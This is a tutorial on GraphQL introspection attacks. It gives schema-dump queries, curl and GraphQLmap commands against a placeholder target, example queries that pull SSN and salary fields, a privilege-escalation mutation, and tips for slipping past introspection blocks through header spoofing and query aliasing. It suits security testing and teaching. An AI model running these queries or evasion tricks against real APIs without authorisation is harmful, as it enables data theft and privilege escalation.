GraphQL introspection attacks

What are GraphQL Introspection Attacks?

GraphQL introspection attacks exploit GraphQL's built-in self-documentation feature that allows clients to query the schema itself. When introspection is enabled in production, attackers can discover the complete API structure, including hidden queries, mutations, sensitive fields, and internal operations that were never intended to be public. This reconnaissance provides a complete roadmap for further attacks.

Vulnerable Scenario Example

Attacker discovers introspection is enabled:

# Simple introspection test
query {
  __schema {
    types {
      name
    }
  }
}

Response reveals entire API structure:

{
  "data": {
    "__schema": {
      "types": [
        {"name": "User"},
        {"name": "AdminUser"}, 
        {"name": "InternalNotes"},
        {"name": "PayrollData"},
        {"name": "DebugInfo"},
        {"name": "SystemConfig"}
      ]
    }
  }
}

Attack Result: Attacker now knows about sensitive types like AdminUser, PayrollData, and DebugInfo that they can target with specific queries to extract confidential data.

How GraphQL Introspection Attacks Work

GraphQL introspection is designed for development and debugging, allowing developers to explore API capabilities. However, when left enabled in production, it provides attackers with complete visibility into the API's internal structure, revealing attack surfaces that would otherwise remain hidden.

Introspection Attack Flow

1. Introspection Discovery - Test if introspection queries are accepted

2. Schema Enumeration - Extract complete schema including all types and fields

3. Sensitive Field Discovery - Identify fields containing confidential data

4. Hidden Endpoint Discovery - Find admin-only or internal queries/mutations

5. Attack Vector Mapping - Plan targeted attacks based on discovered schema

6. Exploitation - Execute attacks on discovered sensitive endpoints

Impact and Consequences

• Complete API Mapping - Full visibility into application structure and capabilities

• Sensitive Data Discovery - Identification of fields containing PII, financial data, secrets

• Hidden Functionality Exposure - Discovery of admin panels, debug endpoints, internal tools

• Attack Surface Expansion - Knowledge of all possible attack vectors

• Business Logic Revelation - Understanding of application workflows and relationships

• Compliance Violations - Exposure of regulated data fields and operations

GraphQL Introspection Fundamentals

Basic Introspection Queries

Schema Overview:

query SchemaOverview {
  __schema {
    queryType {
      name
    }
    mutationType {
      name  
    }
    subscriptionType {
      name
    }
  }
}

Type Discovery:

query TypeDiscovery {
  __schema {
    types {
      name
      kind
      description
    }
  }
}

Query Root Fields:

query QueryFields {
  __schema {
    queryType {
      fields {
        name
        description
        type {
          name
        }
      }
    }
  }
}

Advanced Introspection Techniques

Complete Schema Dump:

query FullIntrospection {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

Introspection Attack Methodology

Initial Introspection Detection

Testing for Enabled Introspection:

Using curl:

# Basic introspection test
curl -X POST https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { queryType { name } } }"}'

# If introspection is enabled, you'll get a response like:
# {"data": {"__schema": {"queryType": {"name": "Query"}}}}

# If disabled, you'll get an error like:
# {"errors": [{"message": "GraphQL introspection is not allowed"}]}

Using Postman:

1. Create new POST request to GraphQL endpoint
2. Set Content-Type: application/json
3. Body (raw JSON):
{
  "query": "{ __schema { types { name } } }"
}
4. Send request and analyze response

Schema Discovery and Analysis

Using GraphQL Playground:

1. Navigate to https://api.target.com/graphql in browser
2. If playground is enabled, schema will auto-populate
3. Browse through Types, Queries, Mutations tabs
4. Look for sensitive types and fields

Using GraphQL Voyager:

1. Install: npm install -g graphql-voyager
2. Run: voyager -e https://api.target.com/graphql
3. Visual schema exploration interface
4. Identify relationships and data flows

Using Burp Suite with InQL Extension:

1. Install InQL extension in Burp Suite
2. Configure proxy to intercept GraphQL requests
3. Use InQL tab to run introspection queries
4. Automatically parse and analyze schema
5. Generate custom queries based on discovered types

Systematic Schema Enumeration

Using GraphQLmap:

# Install GraphQLmap
git clone https://github.com/swisskyrepo/GraphQLmap
cd GraphQLmap
pip3 install -r requirements.txt

# Run introspection
python3 graphqlmap.py -u https://api.target.com/graphql -v --introspection

# Extract sensitive information
python3 graphqlmap.py -u https://api.target.com/graphql --dump-via-introspection

Manual Analysis with Postman Collections:

1. Create Postman collection for introspection
2. Add requests for each introspection type:
   - Schema overview
   - All types enumeration  
   - Query fields discovery
   - Mutation fields discovery
   - Field arguments analysis
3. Run collection and analyze responses
4. Document sensitive findings

Common Introspection Attack Patterns

Sensitive Field Discovery

Identifying High-Value Targets:

# Look for these suspicious type names
query SensitiveTypes {
  __schema {
    types {
      name
      fields {
        name
        type {
          name
        }
      }
    }
  }
}

# Target types containing:
# - "Admin", "Internal", "Private", "Secret"
# - "Password", "Token", "Key", "Hash" 
# - "SSN", "Credit", "Payment", "Salary"
# - "Debug", "Test", "Dev", "Staging"

Field-Level Analysis:

# Examine specific sensitive types
query AdminUserType {
  __type(name: "AdminUser") {
    fields {
      name
      description
      type {
        name
      }
    }
  }
}

# Look for fields like:
# - internalNotes, debugInfo, systemAccess
# - passwordHash, apiKey, privateKey
# - ssn, creditCard, bankAccount
# - salary, compensation, financialData

Hidden Query Discovery

Admin and Internal Queries:

# Discover admin-only queries
query AdminQueries {
  __schema {
    queryType {
      fields {
        name
        description
        args {
          name
          type {
            name
          }
        }
      }
    }
  }
}

# Look for queries like:
# - adminUsers, internalConfig, systemStatus
# - debugInfo, serverMetrics, logData
# - allUsers, userData, privateInfo

Dangerous Mutations:

# Find potentially dangerous mutations
query DangerousMutations {
  __schema {
    mutationType {
      fields {
        name
        description
        args {
          name
          type {
            name
          }
        }
      }
    }
  }
}

# Target mutations like:
# - deleteUser, deleteAllData, resetDatabase
# - updatePermissions, grantAdmin, setRole
# - executeCommand, runScript, systemCommand

Argument and Directive Analysis

Input Validation Discovery:

# Analyze input arguments for injection points
query ArgumentAnalysis {
  __schema {
    queryType {
      fields {
        name
        args {
          name
          type {
            name
            kind
          }
          defaultValue
        }
      }
    }
  }
}

Custom Directives:

# Discover custom directives that might reveal functionality
query CustomDirectives {
  __schema {
    directives {
      name
      description
      locations
      args {
        name
        type {
          name
        }
      }
    }
  }
}

Exploiting Introspection Results

Building Targeted Attacks

Using Discovered Admin Queries:

# From introspection, discovered adminUsers query exists
query ExploitAdminQuery {
  adminUsers {
    id
    username
    email
    permissions
    lastLogin
    # Use fields discovered through introspection
  }
}

Exploiting Sensitive Fields:

# Introspection revealed User type has ssn field
query ExploitSensitiveField {
  users {
    id
    name
    ssn        # Field discovered via introspection
    salary     # Another sensitive field found
    internalNotes
  }
}

Mutation Exploitation

Dangerous Operations:

# Introspection revealed updateUserRole mutation
mutation ExploitPrivilegeEscalation($userId: ID!) {
  updateUserRole(userId: $userId, role: "admin") {
    id
    role
    permissions
  }
}

Advanced Introspection Techniques

Bypassing Disabled Introspection

Alternative Discovery Methods:

# Sometimes individual type introspection works when schema introspection is blocked
query TypeBypass {
  __type(name: "User") {
    fields {
      name
    }
  }
}

# Try different type names discovered through errors or documentation
query DiscoverTypes {
  user1: __type(name: "User") { name }
  admin1: __type(name: "Admin") { name }
  internal1: __type(name: "Internal") { name }
}

Error-Based Schema Discovery:

# Invalid queries can reveal valid field names in error messages
query ErrorBasedDiscovery {
  user {
    invalidField  # Error might list valid fields
  }
}

query TypeErrorDiscovery {
  user(id: "invalid_type") {
    # Type validation errors can reveal expected types
    name
  }
}

Partial Introspection Extraction

Field-by-Field Discovery:

# Using GraphQLmap for partial extraction
python3 graphqlmap.py -u https://api.target.com/graphql --method POST \
  --data '{"query": "{ __type(name: \"User\") { fields { name } } }"}' \
  --header "Authorization: Bearer token"

Burp Suite Intruder for Type Discovery:

1. Capture introspection request in Burp
2. Use Intruder on type name parameter
3. Payload: common type names (User, Admin, Account, etc.)
4. Analyze responses to find valid types
5. Repeat for field discovery on found types

Detection Evasion Techniques

Header Manipulation

Bypassing Introspection Blocks:

# Some implementations check User-Agent
curl -X POST https://api.target.com/graphql \
  -H "User-Agent: GraphiQL" \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { types { name } } }"}'

# Try different origins
curl -X POST https://api.target.com/graphql \
  -H "Origin: https://localhost:3000" \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { types { name } } }"}'

Query Obfuscation

Disguised Introspection:

# Mix introspection with legitimate queries
query MixedQuery {
  users {
    id
    name
  }
  __schema {
    types {
      name
    }
  }
}

# Use aliases to hide introspection
query AliasedIntrospection {
  regularData: users { id }
  schemaInfo: __schema { types { name } }
}

Tools for Introspection Attacks

Specialized GraphQL Tools

GraphQL Security Testing Tools:

• InQL (Burp Suite Extension) - Automated introspection and testing

• GraphQL Voyager - Visual schema exploration

• GraphQLmap - Command-line GraphQL security testing

• GraphQL Playground - Interactive GraphQL IDE with introspection

Manual Testing Tools

Postman Configuration for Introspection:

Collection: GraphQL Introspection Testing
├── Basic Tests
│   ├── Schema Overview
│   ├── Type Discovery  
│   └── Field Enumeration
├── Advanced Tests
│   ├── Complete Schema Dump
│   ├── Directive Analysis
│   └── Argument Discovery
└── Exploitation Tests
    ├── Sensitive Field Access
    ├── Admin Query Testing
    └── Dangerous Mutations

Burp Suite Setup:

1. Install InQL extension
2. Configure GraphQL endpoint in InQL
3. Run introspection scan
4. Analyze results in InQL tab
5. Generate attack queries
6. Use Repeater for manual testing

Browser-Based Testing

GraphQL Playground Access:

1. Try common GraphQL IDE endpoints:
   - /graphql
   - /graphiql
   - /playground
   - /graphql/console
   - /api/graphql

2. Look for exposed development interfaces
3. Use built-in introspection features
4. Export schema for offline analysis